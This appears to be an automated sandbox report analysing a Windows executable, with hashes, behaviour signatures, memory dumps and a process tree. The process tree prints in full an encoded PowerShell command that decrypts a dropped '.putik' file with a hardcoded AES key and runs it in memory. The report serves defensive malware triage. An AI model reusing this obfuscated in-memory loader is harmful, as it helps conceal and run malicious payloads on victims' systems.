Analysis

  • max time kernel
    119s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    18/05/2024, 18:33

General

  • Target

    file.exe

  • Size

    1.0MB

  • MD5

    6e5eee49a751e5c04a74497e21c843b6

  • SHA1

    dc2f6d5353f4f0738a3e3af5f67a82a4035385fd

  • SHA256

    bcfe56501d16cd48586fe4ce169905f5f2fa116e512d4b50c601f3f5ac76ceef

  • SHA512

    7e5aa66c102cf447e6ed8a8ab5419c4ec42432e59af3b0e9211a072bec9b6e3cb18e7227f72f386bc5b72c53f0db96269617e2e309915547056ce14eab368892

  • SSDEEP

    12288:DFbITxwbed/QIA8EmNOwp+y54zcoF7Ca5Jka4zRExDs4CT/PSPdK/4431M73AyJD:5kTFQBeNwQaIEKzTCPdmM73AyXxFLV

Score
3/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1588
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgAMQAwADAAMAAwACkACgAKACQARQYkBkIGKgYgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABUAGUAbQBwAFAAYQB0AGgAKAApAAoAJABGBkUGSAYwBiwGIAA9ACAAJwBmAGkAbABlAC0AKgAuAHAAdQB0AGkAawAnAAoAJABFBkQGQQZfACMGLgZKBjEGIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQARQYkBkIGKgYgAC0ARgBpAGwAdABlAHIAIAAkAEYGRQZIBjAGLAYgAHwAIABTAG8AcgB0AC0ATwBiAGoAZQBjAHQAIABMAGEAcwB0AFcAcgBpAHQAZQBUAGkAbQBlACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEYAaQByAHMAdAAgADEACgAKAGYAdQBuAGMAdABpAG8AbgAgAEEGQwZfACcGRAYqBjQGQQZKBjEGIAB7AAoAIAAgACAAIABwAGEAcgBhAG0AIAAoAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGQQYqBicGLQYsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiwACgAgACAAIAAgACAAIAAgACAAWwBiAHkAdABlAFsAXQBdACQAKAZKBicGRgYnBioGCgAgACAAIAAgACkACgAKACAAIAAgACAAJABFBjQGQQYxBiAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AOgA6AEMAcgBlAGEAdABlACgAKQAKACAAIAAgACAAJABFBjQGQQYxBi4ATQBvAGQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBDAGkAcABoAGUAcgBNAG8AZABlAF0AOgA6AEMAQgBDAAoAIAAgACAAIAAkAEUGNAZBBjEGLgBQAGEAZABkAGkAbgBnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAFAAYQBkAGQAaQBuAGcATQBvAGQAZQBdADoAOgBQAEsAQwBTADcACgAKACAAIAAgACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYgAD0AIAAkAEUGNAZBBjEGLgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQARQZBBioGJwYtBiwAIAAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBikACgAgACAAIAAgACQAKAZKBicGRgYnBioGXwBFBkEGQwZIBkMGKQZfACcGRAYqBjQGQQZKBjEGIAA9ACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkACgGSgYnBkYGJwYqBiwAIAAwACwAIAAkACgGSgYnBkYGJwYqBi4ATABlAG4AZwB0AGgAKQAKAAkACgAgACAAIAAgAHIAZQB0AHUAcgBuACAAJAAoBkoGJwZGBicGKgZfAEUGQQZDBkgGQwYpBl8AJwZEBioGNAZBBkoGMQYKAH0ACgAKACQARQZBBioGJwYtBiAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4AEMAQQAsACAAMAB4AEYAQgAsACAAMAB4AEUAMAAsACAAMAB4ADMAQgAsACAAMAB4ADkARgAsACAAMAB4ADcARgAsACAAMAB4ADMANwAsACAAMAB4ADgANgAsACAAMAB4ADkAMAAsACAAMAB4ADMARAAsACAAMAB4ADcAQgAsACAAMAB4ADkANwAsACAAMAB4ADQAMwAsACAAMAB4ADkARgAsACAAMAB4ADcAQwAsACAAMAB4ADAANwAsACAAMAB4AEYAMAAsACAAMAB4ADEAQQAsACAAMAB4AEYAQwAsACAAMAB4AEQARgAsACAAMAB4ADkANwAsACAAMAB4ADcANgAsACAAMAB4AEUAOAAsACAAMAB4AEEAMQAsACAAMAB4ADAANAAsACAAMAB4ADkANgAsACAAMAB4ADUARAAsACAAMAB4ADcAMwAsACAAMAB4ADEAMwAsACAAMAB4ADYAMgAsACAAMAB4ADQAQgAsACAAMAB4ADIAMwApAAoAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeAA0ADAALAAgADAAeAAyADcALAAgADAAeAAyAEEALAAgADAAeAA4ADgALAAgADAAeAA1ADQALAAgADAAeAA3ADUALAAgADAAeAA3ADAALAAgADAAeABDADQALAAgADAAeAA3ADEALAAgADAAeAA1ADkALAAgADAAeABEAEYALAAgADAAeAA3AEUALAAgADAAeAA5ADMALAAgADAAeABGAEMALAAgADAAeABGADkALAAgADAAeAA5ADcAKQAKAAoAaQBmACAAKAAkAEUGRAZBBl8AIwYuBkoGMQYgAC0AbgBlACAAJABuAHUAbABsACkAIAB7AAoAIAAgACAAIAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGIAA9ACAAJABFBkQGQQZfACMGLgZKBjEGLgBGAHUAbABsAE4AYQBtAGUACgAgACAAIAAgACQAKAYnBkoGKgYnBioGXwBFBjQGQQYxBikGIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGKQA7AAoAIAAgACAAIAAkAEUGLQYqBkgGSQZfAEUGQQZDBkgGQwZfACcGRAYqBjQGQQZKBjEGIAA9ACAAQQZDBl8AJwZEBioGNAZBBkoGMQYgAC0ARQZBBioGJwYtBiAAJABFBkEGKgYnBi0GIAAtAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiAAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAC0AKAZKBicGRgYnBioGIAAkACgGJwZKBioGJwYqBl8ARQY0BkEGMQYpBgoACgAgACAAIAAgACQAKgYsBkUGSgY5BiAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQARQYtBioGSAZJBl8ARQZBBkMGSAZDBl8AJwZEBioGNAZBBkoGMQYpACkAOwAKACAAIAAgACAAJABGBkIGNwYpBl8AJwZEBi8GLgZIBkQGIAA9ACAAJAAqBiwGRQZKBjkGLgBFAG4AdAByAHkAUABvAGkAbgB0ADsACgAgACAAIAAgACQARgZCBjcGKQZfACcGRAYvBi4GSAZEBi4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgB9AAoA
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1532

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\file-2969.putik

          Filesize

          33KB

          MD5

          372ad956b41eb69ed573d788d1c3c345

          SHA1

          d938b238dc47899727af8c707866816ffb0b03b7

          SHA256

          830b8c22c6664fa3e113462842678dfdab9a178ecca492467b198e8228202af1

          SHA512

          feb3dc2c6c64ade5a0b80e2a5a6df8c857a6be9feadf2a83f845d6788726849dfb882d1f0dc42344166d2092ec64d25fc8f7899cb69fa14c096ae85cdd13ec33

        • memory/1532-5-0x000007FEF628E000-0x000007FEF628F000-memory.dmp

          Filesize

          4KB

        • memory/1532-6-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

          Filesize

          9.6MB

        • memory/1532-7-0x000000001B560000-0x000000001B842000-memory.dmp

          Filesize

          2.9MB

        • memory/1532-8-0x0000000002910000-0x0000000002918000-memory.dmp

          Filesize

          32KB

        • memory/1532-9-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

          Filesize

          9.6MB

        • memory/1532-10-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

          Filesize

          9.6MB

        • memory/1532-12-0x000000001B450000-0x000000001B45C000-memory.dmp

          Filesize

          48KB

        • memory/1532-13-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

          Filesize

          9.6MB